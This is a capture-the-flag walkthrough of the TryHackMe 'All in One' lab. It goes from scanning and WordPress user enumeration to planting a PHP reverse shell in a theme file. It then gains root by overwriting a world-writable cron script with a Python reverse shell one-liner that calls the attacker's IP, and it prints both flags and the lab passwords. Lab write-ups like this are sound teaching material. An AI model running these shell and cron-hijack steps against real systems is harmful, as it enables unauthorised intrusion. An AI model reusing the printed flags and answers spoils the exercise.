TryHackMe-All-in-One
Jump to navigation
Jump to search
Initial foothold
Nmap reveals 3 open ports:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.50.72 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA) | 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA) |_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP
The FTP service allows anonymous access but contains nothing.
kali@kali:/data/All_in_One$ ftp 10.10.244.196 Connected to 10.10.244.196. 220 (vsFTPd 3.0.3) Name (10.10.244.196:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 2020 . drwxr-xr-x 2 0 115 4096 Oct 06 2020 .. 226 Directory send OK. ftp> 221 Goodbye.
Web
Web enumeration
Enumerating the web server reveals 2 interesting locations:
kali@kali:/data/vpn$ gobuster dir -u http://10.10.244.196 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.244.196 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/04/27 15:44:13 Starting gobuster =============================================================== /wordpress (Status: 301) /hackathons (Status: 200) /server-status (Status: 403)
Hackathons
This page contains an encrypted string hidden in a comment:
kali@kali:/data/vpn$ curl http://10.10.244.196/hackathons <html> <body> <h1>Damn how much I hate the smell of <i>Vinegar </i> :/ !!! </h1> [REDACTED] <!-- Dvc W@iyur@123 --> <!-- KeepGoing --> </body> </html>
The string is encrypted using Vigenere, with the key KeepGoing. We can decrypt the string using this site:
- Encrypted string:
Dvc W@iyur@123 - Key:
KeepGoing - Decrypted string:
Try H@ckme@123
Wordpress
A wordpress installation is available under the /wordpress directory. Let’s enumerate the users with wpscan:
kali@kali:/data/All_in_One$ wpscan --url http://10.10.244.196/wordpress/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.244.196/wordpress/ [10.10.244.196]
[+] Started: Tue Apr 27 15:34:00 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.244.196/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://10.10.244.196/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.244.196/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.244.196/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.244.196/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
| - http://10.10.244.196/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:03 <=======================================> (10 / 10) 100.00% Time: 00:00:03
[i] User(s) Identified:
[+] elyana
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Tue Apr 27 15:34:07 2021
[+] Requests Done: 23
[+] Cached Requests: 34
[+] Data Sent: 5.951 KB
[+] Data Received: 51.858 KB
[+] Memory used: 201.918 MB
[+] Elapsed time: 00:00:07
I tried to login as elyana with the password Try H@ckme@123 but it failed. I then tried with the password H@ckme@123 and it worked.
Reverse shell
Now connected with admin privileges, edit the 404.php page of the twentytwenty template (http://10.10.244.196/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty) and replace all the code with a PHP reverse shell.
Click on the update button to apply the changes, open a listener (rlwrap nc -nlvp 4444) and browse http://10.10.244.196/wordpress/wp-content/themes/twentytwenty/404.php.
You should now have a reverse shell.
kali@kali:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46330
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:48:29 up 1:49, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
bash-4.4$
User flag
We find the user.txt file in elyana’s home folder, but we don’t have enough permissions to read the file.
bash-4.4$ cd /home cd /home bash-4.4$ ls -la ls -la total 12 drwxr-xr-x 3 root root 4096 Oct 5 2020 . drwxr-xr-x 24 root root 4096 Oct 5 2020 .. drwxr-xr-x 6 elyana elyana 4096 Oct 7 2020 elyana bash-4.4$ cd elyana cd elyana bash-4.4$ ls -la ls -la total 48 drwxr-xr-x 6 elyana elyana 4096 Oct 7 2020 . drwxr-xr-x 3 root root 4096 Oct 5 2020 .. -rw------- 1 elyana elyana 1632 Oct 7 2020 .bash_history -rw-r--r-- 1 elyana elyana 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 elyana elyana 3771 Apr 4 2018 .bashrc drwx------ 2 elyana elyana 4096 Oct 5 2020 .cache drwxr-x--- 3 root root 4096 Oct 5 2020 .config drwx------ 3 elyana elyana 4096 Oct 5 2020 .gnupg drwxrwxr-x 3 elyana elyana 4096 Oct 5 2020 .local -rw-r--r-- 1 elyana elyana 807 Apr 4 2018 .profile -rw-r--r-- 1 elyana elyana 0 Oct 5 2020 .sudo_as_admin_successful -rw-rw-r-- 1 elyana elyana 59 Oct 6 2020 hint.txt -rw------- 1 elyana elyana 61 Oct 6 2020 user.txt bash-4.4$ cat user.txt cat user.txt cat: user.txt: Permission denied
There is a hint that tells us the password may be hidden in the system:
bash-4.4$ cat hint.txt cat hint.txt Elyana's user password is hidden in the system. Find it ;)
Enumerating files owned by the user highlights an interesting file (private.txt) in /etc/mysql/conf.d:
bash-4.4$ find / -user elyana -type f 2>/dev/null find / -user elyana -type f 2>/dev/null /home/elyana/user.txt /home/elyana/.bash_logout /home/elyana/hint.txt /home/elyana/.bash_history /home/elyana/.profile /home/elyana/.sudo_as_admin_successful /home/elyana/.bashrc /etc/mysql/conf.d/private.txt bash-4.4$ cat /etc/mysql/conf.d/private.txt cat /etc/mysql/conf.d/private.txt user: elyana password: E@syR18ght
Now that we have elyana’s password, we no longer need the reverse shell and we can connect via SSH directly:
kali@kali:/data/All_in_One$ sshpass -p "E@syR18ght" ssh [email protected] -bash-4.4$ cat user.txt VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259 -bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}
User flag: THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}
Root flag
Checking the crontab reveals a script (/var/backups/script.sh) executed by root every minute:
-bash-4.4$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root /var/backups/script.sh
And the script is world-writable:
bash-4.4$ ls -l /var/backups/script.sh ls -l /var/backups/script.sh -rwxrwxrwx 1 root root 73 Oct 7 2020 /var/backups/script.sh
Let’s modify it as follows:
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Now, start a listener and wait a minute to get a root shell:
kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344
bash: cannot set terminal process group (2639): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# cd /root
cd /root
root@elyana:~# cat root.txt
cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
root@elyana:~# cat root.txt | base64 -d
cat root.txt | base64 -d
THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}
Root flag: THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}